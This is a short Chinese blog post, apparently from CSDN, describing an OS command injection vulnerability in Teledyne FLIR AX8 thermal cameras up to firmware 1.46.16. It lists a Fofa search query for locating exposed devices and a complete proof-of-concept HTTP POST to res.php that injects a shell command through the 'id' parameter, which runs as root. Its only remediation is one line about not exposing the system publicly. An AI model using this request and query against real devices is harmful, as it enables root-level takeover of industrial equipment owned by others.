1 产品描述:
FLIR-AX8是美国菲力尔公司(Teledyne FLIR)旗下的一款工业红外热像仪AX8,英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。
2 漏洞描述:
Teledyne FLIR AX8 thermal sensor cameras 1.46.16及之前的版本存在操作系统命令注入漏洞,该漏洞源于攻击者可以通过res.php端点中的id HTTP POST参数导致使用root权限在底层操作系统上执行任意命令。
3 影响版本:
FLIR AX8 thermal sensor cameras <= 1.46.16
4 搜索语句:
Fofa:
app="FLIR-FLIR-AX8"
5 漏洞复现:
poc
POST /res.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Cookie:
action=node&resource=1;id
6 修复建议:
如非必要 请勿将系统在公网部署
标签:res,AX8,FLIR,application,thermal,代码执行,image From: https://blog.csdn.net/weixin_45790890/article/details/142499975